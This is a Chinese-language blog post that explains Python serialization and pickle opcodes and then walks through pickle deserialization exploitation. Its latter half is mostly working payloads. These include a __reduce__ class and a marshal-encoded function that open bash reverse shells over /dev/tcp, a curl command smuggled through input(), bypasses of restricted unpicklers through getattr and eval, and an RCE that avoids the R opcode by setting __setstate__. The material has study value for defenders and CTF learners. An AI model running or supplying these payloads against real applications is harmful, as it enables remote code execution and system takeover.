Python-反序列化

反序列化

Posted by BY Diego on April 15, 2020

一.Python 常见的序列化操作

1.json 序列化

支持的数据类型 (数字,字符串,列表,字典,元组)

In [24]: json.dumps(11)
Out[24]: '11'

In [25]: json.dumps("abc")
Out[25]: '"abc"'

In [26]: json.dumps('abc')
Out[26]: '"abc"'

In [27]: json.dumps({"a":"b"})
Out[27]: '{"a": "b"}'

In [28]: json.dumps([1,2,3])
Out[28]: '[1, 2, 3]'

2.pickle序列化

支持的数据类型 数字,字符串,列表,字典,元组 还支持对象

In [11]: import pickle

In [11]: pickle.dumps(1)
Out[11]: 'I1\n.'

In [12]: pickle.dumps("abc")
Out[12]: "S'abc'\np0\n."

In [13]: pickle.dumps({"a":"b"})
Out[13]: "(dp0\nS'a'\np1\nS'b'\np2\ns."

In [14]: pickle.dumps([1,2,3])
Out[14]: '(lp0\nI1\naI2\naI3\na.'

In [16]: pickle.dumps((1,2))
Out[16]: '(I1\nI2\ntp0\n.'

In [18]: pickle.dumps(1.000)
Out[18]: 'F1.0\n.'

In [19]: pickle.dumps(1.0001)
Out[19]: 'F1.0001\n.'

# __init__ 初始化后 序列化才存在name age值
In [20]: class test :
    ...:     def __init__(self):
    ...:         self.name = "test"
    ...:         self.age = 123

In [21]: pickle.dumps(test())
Out[21]: "(i__main__\ntest\np0\n(dp1\nS'age'\np2\nI123\nsS'name'\np3\nS'test'\np4\nsb."

In [22]: class test :
    ...:     name = "test"
    ...:     age = 123
    ...:

In [23]: pickle.dumps(test())
Out[23]: '(i__main__\ntest\np0\n(dp1\nb.'

3.shelve

  • 1.Shelve是对象持久化保存方法,将对象保存到文件里面,缺省(即默认)的数据存储文件是二进制的。
  • 2.可以作为一个简单的数据存储方案。
  • 3.使用时,只需要使用open函数获取一个shelf对象,然后对数据进行增删改查操作,在完成工作、并且将内存存储到磁盘中,最后调用close函数变回将数据写入文件。
  • 4.支持的数据类型 数字,字符串,列表,字典,元组 同样支持对象 基本用法 存储 :打开文件 -> 存储 -> 关闭 读取 :打开文件 -> 读取 -> 关闭
In [1]: import shelve
In [2]: s = shelve.open('shelve')
In [3]: s["name"] = "test"
In [4]: s.close()

In [5]: s = shelve.open('shelve')

In [6]: s["name"]
Out[6]: 'test'

In [12]: s["int"] = 99999
In [13]: s["float"] = 99999.9999
In [14]: s["dict"] = [1,2,3,4,5,6]
In [15]: s["tuple"] = (1,2,3)
In [16]: s["zidian"] = {"a":"b"}
In [17]: class test :
   ...:     def __init__(self):
   ...:         self.name = "test"
   ...:         self.age = 123
   ...:

In [18]: s["test"] = test()
In [19]: s["test"]
Out[19]: <__main__.test instance at 0x7f92f0015690>

存储方式

在文件存储的位置不相同 JFNPz9.png JFNAqx.png

二 .Pickele序列化过程

字符含义

c:引入模块和对象,模块名和对象名以换行符分割。
(:压入一个标志到栈中,表示元组的开始位置
t:从栈顶开始,找到最上面的一个(,并将(到t中间的内容全部弹出,组成一个元组,再把这个元组压入栈中
R:从栈顶弹出一个可执行对象和一个元组,元组作为函数的参数列表执行,并将返回值压入栈上
p:将栈顶的元素存储到memo中,p后面跟一个数字,就是表示这个元素在memo中的索引
V、S:向栈顶压入一个(unicode)字符串
.:表示整个程序结束

序列化分析工具 pickletools 用来理解序列化后的字符串含义及分析序列化过程 JFWMEF.png

对于类

先简单序列化一个对象

class test():
   def __init__(self):
      self.name = "test"
      self.age = 999

JFoNDI.png 0,1,2号版本 ,不同版本号产生的序列不同(向前兼容) JFIFld.png

通过代码输出序列化协议

import pickletools
import prettytable

opcode_table = prettytable.PrettyTable()
opcode_table.field_names = ['Name', 'Code', 'Docs']
for opcode in pickletools.opcodes:
     opcode_table.add_row([opcode.name, opcode.code,opcode.doc.splitlines()[0]])

 print(opcode_table)

如下

+------------------+------+-----------------------------------------------------------------+
|       Name       | Code |                               Docs                              |
+------------------+------+-----------------------------------------------------------------+
|       INT        |  I   |                     Push an integer or bool.                    |
|      BININT      |  J   |                 Push a four-byte signed integer.                |
|     BININT1      |  K   |                Push a one-byte unsigned integer.                |
|     BININT2      |  M   |                Push a two-byte unsigned integer.                |
|       LONG       |  L   |                       Push a long integer.                      |
|      LONG1       | \x8a |               Long integer using one-byte length.               |
|      LONG4       | \x8b |              Long integer using found-byte length.              |
|      STRING      |  S   |                   Push a Python string object.                  |
| SHORT_BINSTRING  |  U   |                   Push a Python string object.                  |
|     BINBYTES     |  B   |                   Push a Python bytes object.                   |
|  SHORT_BINBYTES  |  C   |                   Push a Python bytes object.                   |
|    BINBYTES8     | \x8e |                   Push a Python bytes object.                   |
|       NONE       |  N   |                     Push None on the stack.                     |
|     NEWTRUE      | \x88 |                    Push True onto the stack.                    |
|     NEWFALSE     | \x89 |                    Push False onto the stack.                   |
|     UNICODE      |  V   |               Push a Python Unicode string object.              |
| SHORT_BINUNICODE | \x8c |               Push a Python Unicode string object.              |
|    BINUNICODE    |  X   |               Push a Python Unicode string object.              |
|   BINUNICODE8    | \x8d |               Push a Python Unicode string object.              |
|      FLOAT       |  F   |            Newline-terminated decimal float literal.            |
|     BINFLOAT     |  G   |        Float stored in binary form, with 8 bytes of data.       |
|    EMPTY_LIST    |  ]   |                       Push an empty list.                       |
|      APPEND      |  a   |                   Append an object to a list.                   |
|     APPENDS      |  e   |            Extend a list by a slice of stack objects.           |
|       LIST       |  l   |  Build a list out of the topmost stack slice, after markobject. |
|   EMPTY_TUPLE    |  )   |                       Push an empty tuple.                      |
|      TUPLE       |  t   | Build a tuple out of the topmost stack slice, after markobject. |
|      TUPLE1      | \x85 |     Build a one-tuple out of the topmost item on the stack.     |
|      TUPLE2      | \x86 |     Build a two-tuple out of the top two items on the stack.    |
|      TUPLE3      | \x87 |   Build a three-tuple out of the top three items on the stack.  |
|    EMPTY_DICT    |  }   |                       Push an empty dict.                       |
|       DICT       |  d   |  Build a dict out of the topmost stack slice, after markobject. |
|     SETITEM      |  s   |            Add a key+value pair to an existing dict.            |
|     SETITEMS     |  u   | Add an arbitrary number of key+value pairs to an existing dict. |
|    EMPTY_SET     | \x8f |                        Push an empty set.                       |
|     ADDITEMS     | \x90 |       Add an arbitrary number of items to an existing set.      |
|    FROZENSET     | \x91 |  Build a frozenset out of the topmost slice, after markobject.  |
|       POP        |  0   |   Discard the top stack item, shrinking the stack by one item.  |
|       DUP        |  2   |  Push the top stack item onto the stack again, duplicating it.  |
|       MARK       |  (   |                 Push markobject onto the stack.                 |
|     POP_MARK     |  1   |  Pop all the stack objects at and above the topmost markobject. |
|       GET        |  g   |      Read an object from the memo and push it on the stack.     |
|      BINGET      |  h   |      Read an object from the memo and push it on the stack.     |
|   LONG_BINGET    |  j   |      Read an object from the memo and push it on the stack.     |
|       PUT        |  p   |   Store the stack top into the memo.  The stack is not popped.  |
|      BINPUT      |  q   |   Store the stack top into the memo.  The stack is not popped.  |
|   LONG_BINPUT    |  r   |   Store the stack top into the memo.  The stack is not popped.  |
|     MEMOIZE      | \x94 |   Store the stack top into the memo.  The stack is not popped.  |
|       EXT1       | \x82 |                         Extension code.                         |
|       EXT2       | \x83 |                         Extension code.                         |
|       EXT4       | \x84 |                         Extension code.                         |
|      GLOBAL      |  c   |         Push a global object (module.attr) on the stack.        |
|   STACK_GLOBAL   | \x93 |         Push a global object (module.attr) on the stack.        |
|      REDUCE      |  R   |   Push an object built from a callable and an argument tuple.   |
|      BUILD       |  b   |   Finish building an object, via __setstate__ or dict update.   |
|       INST       |  i   |                     Build a class instance.                     |
|       OBJ        |  o   |                     Build a class instance.                     |
|      NEWOBJ      | \x81 |                    Build an object instance.                    |
|    NEWOBJ_EX     | \x92 |                    Build an object instance.                    |
|      PROTO       | \x80 |                   Protocol version indicator.                   |
|       STOP       |  .   |                   Stop the unpickling machine.                  |
|      FRAME       | \x95 |              Indicate the beginning of a new frame.             |
|      PERSID      |  P   |          Push an object identified by a persistent ID.          |
|    BINPERSID     |  Q   |          Push an object identified by a persistent ID.          |
+------------------+------+-----------------------------------------------------------------

c GLOBAL操作符读取全局变量 使用的find_class函数而find_class对于不同的协议版本实现也不一样总之它干的事情是'去x模块找到y'y必须在x的顶层
p 将栈顶的元素存储到memo中p后面跟一个数字就是表示这个元素在memo中的索引 q与之类似

\x80\x03c__main__\ntest\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03X\x04\x00\x00\x00testq\x04X\x03\x00\x00\x00ageq\x05M\x0f'ub.

对照查表

    0: \x80 PROTO      3 # 协议版本3 => \x80\x03
    2: c    GLOBAL     '__main__ test' # 将(module.attr)压入栈
   17: q    BINPUT     0 # 标记 q\x00
   19: )    EMPTY_TUPLE # 把一个空的tuple压入当前栈
   20: \x81 NEWOBJ  # 从栈中先弹出一个元素,记为args;再弹出一个元素,记为cls。接下来,执行cls.__new__(cls, *args) ,然后把得到的东西压进栈。
   21: q    BINPUT     1 #标记 q\x01
   23: }    EMPTY_DICT   # 把一个空的dict压进栈
   24: q    BINPUT     2 # q\x02
   26: (    MARK        # 把当前栈这个整体,作为一个list,压进前序栈。把当前栈清空。
   27: X        BINUNICODE 'name'  #插入一个BINUNICODE X\x04\x00\x00\x00name 表示长度为4 固定四位 第一位为变量的长度若属于ascii表示范围则用字符表示,超过\xff 向后进位
   36: q        BINPUT     3 # q\x03
   38: X        BINUNICODE 'test' #X\x04\x00\x00\x00name 同上插入 name
   47: q        BINPUT     4 # q\x04
   49: X        BINUNICODE 'age' #X\x03\x00\x00\x00age
   57: q        BINPUT     5  # q\x05
   59: M        BININT2    9999 # 插入两个字节的整数 hex(9999) = 270f  反转 \x0f\x027 -> M\x0f'
   62: u        SETITEMS   (MARK at 26) # 将当前栈恢复到(标记时的状态,然后形成arr=['name', 'test, 'age',9999],两个一组地读arr里面的元素,前者作为key,后者作为value,存进23所述的dict
   63: b    BUILD  #把当前栈栈顶存进state,然后弹掉。把当前栈栈顶记为inst,然后弹掉。利用state这一系列的值来更新实例inst。把得到的对象扔进当前栈。
   64: .    STOP

注:这里更新实例的方式是:如果inst拥有__setstate__方法,则把state交给__setstate__方法来处理;否则的话,直接把state这个dist的内容,合并到inst.__dict__ 里面。

具体问题参考 从零开始python反序列化攻击

借用一下别人的图,理解一下当前栈 前序栈和存储区 JFx5vV.png

大致流程如下 JkNDD1.png

对于函数

如何反序列化一个函数,通过下面两个例子来演示一下

例子一

反序列化一个system(“whoami”) 如果上下文存在 os模块

cos #模块为os
system #对象名 system
(S'whoami' #(可以理解为system()的( 虽然不是很准确
tR.  # t相当于与上一个(形成了() R弹出两个元素执行 .结束

执行效果 JFBsm9.png

分析工具分析 JFh678.png

在上下文中没有import os 的情况下 如下图 在这里插入图片描述

例子二

存在限制 万桶金 builtins.getattr(‘builtins’, ‘eval’)

class RestrictedUnpickler(pickle.Unpickler):
    blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit'}

    def find_class(self, module, name):
        if module == "builtins" and name not in self.blacklist:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

一、 转化

目标
getattr(dict.get(globals(),"__builtins__"),"eval")
转化
__builtins__.getattr(__builtins__.dict,"get")(__builtins__.globals(),"__builtins__") #->p1("builtins")

二 、构造

 __builtins__.getattr

(cbuiltins
getattr
 (__builtins__.dict,"get")

(cbuiltins
dict
S'get'
t
 __builtins__.getattr(__builtins__.dict,"get")

(cbuiltins
getattr
(cbuiltins
dict
S'get'
tR
 (__builtins__.globals(),"__builtins__")

(cbuiltins
globals
(tRS'__builtins__'
t
 __builtins__.getattr(__builtins__.dict,"get")(__builtins__.globals(),"__builtins__")

(cbuiltins
getattr
(cbuiltins
dict
S'get'
tR(cbuiltins
globals
(tRS'__builtins__'
tR.

成功构造了__builtins__ JF2nx0.png

置为p1

(cbuiltins
getattr
(cbuiltins
dict
S'get'
tR(cbuiltins
globals
(tRS'__builtins__'
tRp1

使用

__builtins__.getattr(p1,"eval")('__import__("os").system("whoami")')

cbuiltins
getattr
(g1
S'eval'
tR(S'__import__("os").system("whoami")'
R.

三 .反序列化漏洞利用

别人总结的命令函数

eval, execfile, compile, open, file, map, input,
os.system, os.popen, os.popen2, os.popen3, os.popen4, os.open, os.pipe,
os.listdir, os.access,
os.execl, os.execle, os.execlp, os.execlpe, os.execv,
os.execve, os.execvp, os.execvpe, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe,
os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe,
pickle.load, pickle.loads,cPickle.load,cPickle.loads,
subprocess.call,subprocess.check_call,subprocess.check_output,subprocess.Popen,
commands.getstatusoutput,commands.getoutput,commands.getstatus,
glob.glob,
linecache.getline,
shutil.copyfileobj,shutil.copyfile,shutil.copy,shutil.copy2,shutil.move,shutil.make_archive,
dircache.listdir,dircache.opendir,
io.open,
popen2.popen2,popen2.popen3,popen2.popen4,
timeit.timeit,timeit.repeat,
sys.call_tracing,
code.interact,code.compile_command,codeop.compile_command,
pty.spawn,
posixfile.open,posixfile.fileopen,
platform.popen

①没有任何过滤

payload生成如下

#!/usr/bin/env python
import pickle
import os

class exp(object):
    def __reduce__(self):
        s = """bash -i >& /dev/tcp/ip/port 0>&1"""
        return (os.system, (s,))

class Exploit(object):
    def __reduce__(self):
 	  return map,(os.system,["ls"])

e = exp()
s = pickle.dumps(e)

②input 函数利用

c__builtin__
setattr
(c__builtin__
__import__
(S'sys'
tRS'stdin'
cStringIO
StringIO
(S'__import__('os').system(\'curl 127.0.0.1:12345\')'
tRtRc__builtin__
input
(S'input: '
tR.

③任意函数构造

python2 环境

import base64
import marshal

def foo():
    import os
    os.system('bash -c "bash -i >& /dev/tcp/127.0.0.1/12345 0<&1 2>&1"')

payload="""ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'%s'
tRtRc__builtin__
globals
(tRS''
tR(tR."""%base64.b64encode(marshal.dumps(foo.func_code))

pickle.loads(payload)

payload="""ctypes
FunctionType
(cmarshal
loads
(S'%s'
tRc__builtin__
globals
(tRS''
tR(tR."""%marshal.dumps(foo.func_code).encode('string-escape')

pickle.loads(payload)

④导致变量引入

将类的例子序列化的结果改为如下,先往os设置一个name

\x80\x03c__main__\ntest\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03cos\nname\nq\x04X\x03\x00\x00\x00ageq\x05M\x0f'ub.

a.name 成了 os.name的值 JAFFbt.png

可以获取一些敏感信息

⑤导致属性增加 也可以覆盖原值

通过GLOBAL指令引入的变量,可以看作是原变量的引用。我们在栈上修改它的值,会导致原变量也被修改! 一开始举得例子里我们把一个dict压进栈,内容是{‘name’: ‘test’, ‘age’: 9999} 执行BUILD指令,会导致改写 __main__.test.name和 __main__.test.age ,test.name和test.grade已经改成我们想要的内容

因此可以伪造任意class的属性

\x80\x03c__main__\ntest\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03X\x04\x00\x00\x00testq\x04X\x03\x00\x00\x00ageq\x05M\x0f'q\x06X\x04\x00\x00\x00aaaaq\x07X\x04\x00\x00\x00ookkub.

JAM14s.png JAmZeH.png

⑥无R指令RCE

class RestrictedUnpickler(pickle.Unpickler):
    safe_builtins = []
    def find_class(self, module, name):
        # Only allow safe classes from builtins.
        if "R" not in module and name in safe_builtins:
            return getattr(builtins, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))
def restricted_loads(s):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(s)).load()

若R指令被禁用 test原先是没有__setstate__这个方法的。那么我们利用{‘__setstate__’: os.system}来BUILE这个对象,那么现在对象的__setstate__就变成了os.system;接下来利用”ls /”来再次BUILD这个对象,则会执行setstate(“ls /”) ,而此时__setstate__已经被我们设置为os.system,因此实现了RCE.

\x80\x03c__main__\ntest\n)\x81}(V__setstate__\ncos\nsystem\nubVls /\nb.

JAmhp6.png

⑦构造 render_template_string 进行ssti

payload="cflask.templating\nrender_template_string\np0\n(S\"\"\np1\ntp2\nRp3\n."

参考

Python反序列化漏洞的花式利用

绕过 RestrictedUnpickler

从零开始python反序列化攻击

Code-Breaking中的两个Python沙箱